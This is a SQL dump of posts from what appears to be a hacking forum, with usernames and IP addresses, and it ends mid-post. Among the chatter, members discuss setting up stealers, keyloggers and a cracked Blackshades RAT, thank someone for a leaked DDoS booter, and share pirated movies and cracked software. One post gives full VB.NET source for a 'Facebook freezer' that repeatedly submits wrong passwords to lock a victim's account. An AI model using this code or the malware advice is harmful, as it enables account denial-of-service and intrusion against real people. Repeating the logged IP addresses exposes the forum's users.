'87f70c33b63526068fc49d55beb91afa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3261', '652', '3206', '7', 'RE: Being CyberBullied', '0', '2', 'Apathy', '1349299895', 'I did not specify anything whatsoever ever also I do not do illegal things so it would not matter. :3 Me and NHK got you iPod. Also by any chance are you Indian? Because Brampton?', '173.206.177.26', '-1378963174', '0', '0', '0', '0', '1', '9f66b286f3f12fec4951a8eb0345fd7d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3262', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '100', '??zg???g????61', '1349302694', 'Could I have this? Thanks bro', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '88b378c452cc4df5eef7090d007d7ef1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3263', '652', '3259', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349303023', '[quote=\'iTzGRONgamer61\' pid=\'3259\' dateline=\'1349297086\'] xD well if someone was looking for you, you just did them the giant favor of narrowing it down a LOT. True its not specific but whatever xD [/quote] Everyones IP\'s are logged on this site It\'s public information. No one can hide.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '639eb2f7014fde407bb1b62216866dfb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3264', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1349303344', 'MY LADY LUMPS my friends name on steam I was adding him, I promise.', '99.253.94.204', '1677549260', '1', '0', '61', '1349303382', '1', 'ef37ca182d9e9ee9c40bda3270d3cfac', '0', '1349303382'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3265', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '100', '??zg???g????61', '1349304215', 'They don\'t have a contact us form xD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a1d8119d1d77556306f66eedaaa1a391', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3266', '589', '3254', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349304798', '[quote=\'iTzGRONgamer61\' pid=\'3254\' dateline=\'1349285261\'] Neon, you think you could set a server up for me? I\'ll give you the FTP info, if you could that would be amazing. I\'m on a mac so I can\'t do it myself. [hr] PM me if thats a yes ;DDDD [/quote] dude im blackhat... of course i can set it up for you but i suggest using a RAT instead of a stealer for more options and fun ;) or just stick with a direct email/keylogger', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'd86871ad4e08ff0784c8d2839f33335b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3267', '656', '0', '8', 'why do ppl like this shitty song!?!?', '0', '203', 'NeonLights', '1349304875', '[align=center][video=youtube]http://www.youtube.com/watch?v=7Dqgr0wNyPo[/video] Tell me whats so good about it? All I know is it ruins a good boner -.-[/align]', '67.68.75.193', '1128549313', '1', '0', '82', '1349305406', '1', '04ffb2633adbf388a587d419b0c54a20', '0', '1349305406'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3268', '657', '0', '19', '[Junk]why do ppl like this shitty song!?!?', '0', '203', 'NeonLights', '1349304913', '[align=center][video=youtube]http://www.youtube.com/watch?v=7Dqgr0wNyPo[/video] tell me whats so good about it? all i know is it ruins a good boner -.-[/align]', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '04ffb2633adbf388a587d419b0c54a20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3269', '657', '3268', '19', 'RE: why do ppl like this shitty song!?!?', '0', '82', 'iTzIpod', '1349305354', 'Junking this thread because it was posted twice [hr] This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '82', '1349305372', '1', 'b9f4f4fb53f75a794a70a682e7a9d9c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3270', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '82', 'iTzIpod', '1349305417', 'I don\'t like this song either... :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '72afa647078e262dad73f56eb2047f26', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3271', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349305454', 'http://external.ak.fbcdn.net/safe_image.php?d=AQAKdVdlN35tHq_Z&w=90&h=90&url=http%3A%2F%2Fplopu.com%2Fimg%2Fmin%2F2012%2F9%2F271.jpg I don\'t know.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dd48c3223f9a13791b0928f25576a32a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3272', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349305517', 'I\'m not Indian Apathy. I am Asian. (Vietnamese)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9943406643929cc4b38bc98361782419', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3273', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '82', 'iTzIpod', '1349305560', 'User is banned. Thread is junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b63ba3063b06cdbdf4150ac47f3ad644', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3274', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1349307932', 'Can someone help me out? @Reloadzor? Etc. Someone..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '30bcbc1b208f7d6a3d40eb65d3794977', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3275', '656', '3270', '8', 'RE: why do ppl like this shitty song!?!?', '0', '203', 'NeonLights', '1349308646', '[quote=\'iTzIpod\' pid=\'3270\' dateline=\'1349305417\'] I don\'t like this song either... :o [/quote] IKR all i hear is kids listening to this shit in the bus every morning its so dam enoying...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '4e3d8997116a452b6245eb23674f1e20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3276', '112', '283', '19', '[Junk]??? Ultimate Premium PPD Ebooks Give away ???', '0', '61', 'NXK', '1349309513', 'This thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3277', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '100', '??zg???g????61', '1349312804', '[quote=\'NeonLights\' pid=\'3266\' dateline=\'1349304798\'] dude im blackhat... of course i can set it up for you but i suggest using a RAT instead of a stealer for more options and fun ;) or just stick with a direct email/keylogger [/quote] I have a cracked version of blackshades. (I think its cracked LOL) again I\'m on a mac, and VMware doesn\'t like me. I\'m having a lot of trouble setting it up, for some reason I\'m having port forwarding issues. To my knowledge, I do know how to port forward. I\'m PM\'ing you now, maybe we can do a team viewer/skype session ;D thanks bro!', '65.96.215.138', '1096865674', '1', '0', '100', '1349312889', '1', 'ace49f32dfab52c2492b299c67617674', '0', '1349312889'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3278', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '1', 't3h jok3r', '1349317487', 'Moved to the right section. It\'s basically the background music that attracts most people. It\'s a slow rap song and some listen to it to fit with the others.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cf5cf8ed37f5d9c85cabba2b3c0dd9ee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3279', '652', '3206', '7', 'RE: Being CyberBullied', '0', '1', 't3h jok3r', '1349317626', 'Well they would have to sign up on this site to view the posts so they are pretty safe. Hey I didn\'t know most hackers are canadians ???', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '941673f334fa7164964e7366efb1ee47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3280', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1349317652', 'http://www.youtube.com/2012thevoiceof?feature=inp-lt-ype-63 First presidential debate.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5449182d11ce37cd8d83cc3e2ff1ca54', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3281', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '1', 't3h jok3r', '1349317737', 'I didn\'t even that this thread was posted. Add something under your name.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '33fe43881460ca66f2df31fa92f6ad8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3282', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1349317860', '32. I have an Ipod Touch, the new Ipad and Iphone 5S :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '52f01162b6c15025e2ec2021780f3ba3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3283', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349317948', 'Thanks mothered and don\'t forget to vote for us in the link in my signature.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0087d7fb290d00afae421480b6149698', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3284', '655', '3253', '43', 'RE: ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '1', 't3h jok3r', '1349317995', '[mod]5. You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"reputation is appreciated\". [/mod] You have 30 hours to update the thread and thanks for the service.', '72.231.24.165', '1223104677', '1', '0', '1', '1349459460', '1', '85631030a83227972ce37c1a2a6dff5a', '0', '1349459460'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3285', '654', '3234', '9', 'RE: Make money typing captchas', '0', '1', 't3h jok3r', '1349318211', '[quote=\'iTzIpod\' pid=\'3234\' dateline=\'1349263755\'] Alrready posted this thread in the Monetizing Section. [/quote] I don\'t see your thread or is it in Unique?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '03e3536dff1e2de3b69719874ba95173', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3286', '658', '0', '52', '[Source]FB login + FB freezer using httpwebrequest', '0', '7', 'Romdu62', '1349319847', 'I\'ve Found a Way for Login into FaceBook Using HttpWebRequest By Using This You Need Textboxs Textbox1 for Email Textbox2 For Password (put the PasswordChar to systemDefault) Button for Login Ours Imports :- [code] Imports System.Net Imports System.Text Imports System.IO [/code] After the Public Class Form Add this :- [code] Sub login(ByVal email As String, ByVal password As String) If TextBox1.Text = String.Empty AndAlso TextBox2.Text = String.Empty Then MsgBox(\"Put your email & password\", 0, \"Input data\") Else Dim postData As String = \"email=\" & email & \"&pass=\" & password & \"\" Dim tempcookies As New CookieContainer Dim encoding As New UTF8Encoding Dim byteData As Byte() = encoding.GetBytes(postData) Dim postreq As HttpWebRequest = DirectCast(HttpWebRequest.Create(\"https://www.facebook.com/login.php?iphone&next=http%3A%2F%2Ftouch.facebook.com%2Findex.php%3Feu%3DD0sS06p7LA4Jn5QzzqNH??Qg&refsrc=http%3A%2F%2Ftouch.facebook.com%2F\"), HttpWebRequest) postreq.Method = \"POST\" postreq.KeepAlive = True postreq.CookieContainer = tempcookies postreq.UserAgent = \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre\" postreq.ContentType = \"application/x-www-form-urlencoded\" postreq.Referer = \"http://touch.facebook.com/login.php?next=http%3A%2F%2Ftouch.facebook.com%2Findex.php%3Feu%3DD0sS06p7LA4Jn5??QzzqNHQg&refsrc=http%3A%2F%2Ftouch.facebook.com%2F&_rdr\" postreq.ContentLength = byteData.Length Dim postreqstream As Stream = postreq.GetRequestStream() postreqstream.Write(byteData, 0, byteData.Length) postreqstream.Close() Dim postresponse As HttpWebResponse postresponse = DirectCast(postreq.GetResponse, HttpWebResponse) tempcookies.Add(postresponse.Cookies) logincookie = tempcookies Dim postreqreader As New StreamReader(postresponse.GetResponseStream()) Dim thepage As String = postreqreader.ReadToEnd If thepage.Contains(\"Incorrect email/password combination\") = True Then MsgBox(\"Incorrect email/password combination\", 0, \"Login error!\") Else MsgBox(\"Logged in\", 0, \"Success!\") End If If thepage.Contains(\"You have exceeded the number of invalid login attempts that we allow for your account\") = True Then MsgBox(\"You have exceeded the number of invalid login attempts\", 0, \"Max number of wrong logins\") End If End If End Sub [/code] Click the Button1 and Add this Code :- [code] login(TextBox1.Text, textbox2.text) [/code] ======================================================== You Also Use it as the FaceBook Freezer By Using httpwebrequest it should be very fast Put this Code in Timer1_trick :- [code] login(TextBox1.Text, \"12312332112123\") [/code] Freezer Login Code :- [code] Sub login(ByVal email As String, ByVal password As String) Dim postData As String = \"email=\" & email & \"&pass=\" & password & \"\" Dim tempcookies As New CookieContainer Dim encoding As New UTF8Encoding Dim byteData As Byte() = encoding.GetBytes(postData) Dim postreq As HttpWebRequest = DirectCast(HttpWebRequest.Create(\"https://www.facebook.com/login.php?iphone&next=http%3A%2F%2Ftouch.facebook.com%2Findex.php%3Feu%3DD0sS06p7LA4Jn5QzzqNH??Qg&refsrc=http%3A%2F%2Ftouch.facebook.com%2F\"), HttpWebRequest) postreq.Method = \"POST\" postreq.KeepAlive = True postreq.CookieContainer = tempcookies postreq.UserAgent = \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre\" postreq.ContentType = \"application/x-www-form-urlencoded\" postreq.Referer = \"http://touch.facebook.com/login.php?next=http%3A%2F%2Ftouch.facebook.com%2Findex.php%3Feu%3DD0sS06p7LA4Jn5??QzzqNHQg&refsrc=http%3A%2F%2Ftouch.facebook.com%2F&_rdr\" postreq.ContentLength = byteData.Length Dim postreqstream As Stream = postreq.GetRequestStream() postreqstream.Write(byteData, 0, byteData.Length) postreqstream.Close() Dim postresponse As HttpWebResponse postresponse = DirectCast(postreq.GetResponse, HttpWebResponse) tempcookies.Add(postresponse.Cookies) logincookie = tempcookies Dim postreqreader As New StreamReader(postresponse.GetResponseStream()) Dim thepage As String = postreqreader.ReadToEnd If thepage.Contains(\"You have exceeded the number of invalid login attempts that we allow for your account\") = True Then MsgBox(\"The FaceBook account \" & (TextBox1.Text) & \" is Frozen\", MsgBoxStyle.OkOnly, \"Operation Successfull\") End If End Sub [/code] Click the Button1 and Add this Code :- [code] Timer1.Start() [/code] Enjoy!', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '20c135aa7a2e1497b1351eeb032dab85', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3287', '487', '2354', '56', 'RE: Corrupt a wish', '0', '7', 'Romdu62', '1349319915', 'Granted. People would call you a nerd whole life. I wish I was a Elite member.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '792f6f17afbecda817ab9e405f3e072a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3288', '486', '2353', '56', 'RE: Guess how many?', '0', '7', 'Romdu62', '1349319955', 'I didn\'t even get that far lol', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1636e8fa40a0e850d72d1ed20100ca6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3289', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '7', 'Romdu62', '1349319999', 'Now we are on 28.96 so way better than our previous records and i noticed that the stats aren\'t updating.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bb273358445f5c35885e84b4ed7d9565', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3290', '197', '696', '56', 'RE: /me Thread', '0', '7', 'Romdu62', '1349320056', '/me likes the unique userbar and is glad Ipod is the leader.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f316517665d4f195b80a5b0f752769b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3291', '238', '1021', '56', 'RE: Ban the user above you', '0', '7', 'Romdu62', '1349320087', 'Banned for having a l33thacking.net email.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '212a321b4b875070e13344caab59689b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3292', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '7', 'Romdu62', '1349320171', 'Thanks Anonymous i\'m also looking forward for your guides.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1cfc04e9a2ac8adbf9ffb854cbbf0016', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3293', '659', '0', '64', 'Stolen (2012) Movie RIP', '0', '5', 'Timmy', '1349320608', '[align=center][img]http://rebeccawangentertainment.files.wordpress.com/2012/09/stolen-2012-movie-poster-e1337273042255.jpg[/img][/align] [b]Description:[/b] A former thief frantically searches for his missing daughter, who has been kidnapped and locked in the trunk of a taxi [b]Movie Rating:[/b] 8 [b]Genre:[/b] Action, Thriller [u][b]Links[/b][/u] [url=http://www.embedder.eu/frame.php?url=http://www.sockshare.com/file/F36F373F660B7AA0]Sockshare[/url] [url=http://www.embedder.eu/frame.php?url=http://www.putlocker.com/file/1F040C0B7FC268BA]Putlocker[/url] [url=http://skylo.me/vv.php?Id=5a510bcd4daca309b595eec6d652aac5]Skylo[/url] [url=http://fleon.me/vv.php?Id=c8a0398711930cdf1a2b6d91c9a001e9]Fleon[/url] Enjoy the movie!', '72.231.24.165', '1223104677', '1', '0', '5', '1349320630', '1', 'ed62229a41940b9a15d2f2b6ec260dd1', '0', '1349320630'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3294', '652', '3279', '7', 'RE: Being CyberBullied', '0', '2', 'Apathy', '1349320746', '[quote=\'t3h jok3r\' pid=\'3279\' dateline=\'1349317626\'] Well they would have to sign up on this site to view the posts so they are pretty safe. Hey I didn\'t know most hackers are canadians ??? [/quote] Unit is true well most people think we just drink beer, ride polar bears and stay in a igloo what we really do is use the igloo to keep the room cool fro us using the computer to hack too much.', '173.206.177.26', '-1378963174', '0', '0', '0', '0', '1', '40cf054ed8c391823d7312d5020320dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3295', '650', '3193', '61', 'RE: [LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '5', 'Timmy', '1349320807', 'I agree with both of you and thanks for this booter.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd1cf6b17e8c8cd9445e0aa7e0c43cf2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3296', '652', '3294', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349320837', '[quote=\'Apathy\' pid=\'3294\' dateline=\'1349320746\'] [quote=\'t3h jok3r\' pid=\'3279\' dateline=\'1349317626\'] Well they would have to sign up on this site to view the posts so they are pretty safe. Hey I didn\'t know most hackers are canadians ??? [/quote] Unit is true well most people think we just drink beer, ride polar bears and stay in a igloo what we really do is use the igloo to keep the room cool fro us using the computer to hack too much. [/quote] I do ride polar bars and live in igloos and drink beer all day though :(', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'cb8ab6e49774ec95b9cd0a5fdcc4b46c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3297', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '5', 'Timmy', '1349320849', 'thanks for mentioning my username and i voted for l33thacking already', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b4a7bedad573a49028434ac59661f8c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3298', '487', '3287', '56', 'RE: Corrupt a wish', '0', '2', 'Apathy', '1349321018', '[quote=\'Romdu62\' pid=\'3287\' dateline=\'1349319915\'] Granted. People would call you a nerd whole life. I wish I was a Elite member. [/quote] Granted. You would be awesome for your whole life. D: I wish I could protect those close to me from everything.', '173.206.177.26', '-1378963174', '0', '0', '0', '0', '1', '1e887e9f459c23fd7cf0cb36eb4aeb3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3299', '645', '3154', '30', 'RE: [GET] Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked !', '0', '1', 't3h jok3r', '1349323206', 'Honestly no but the instructions on cracking it and using it are known and I have followed the instructions on a different version was successful.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '31bb951568c4dc206168ea4d7d5e6143', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3300', '660', '0', '30', 'Vulcan Private Logger', '0', '5', 'Timmy', '1349323439', '[align=center][img]http://gyazo.com/f7026470baa697100b9bb6d60394d5c6.png?1348625841[/img] [url=http://elementscanner.net//?RE=e71a1800c268597561374acf065042a6][img]http://elementscanner.net//image.php?ID=e71a1800c268597561374acf065042a6[/img][/url] 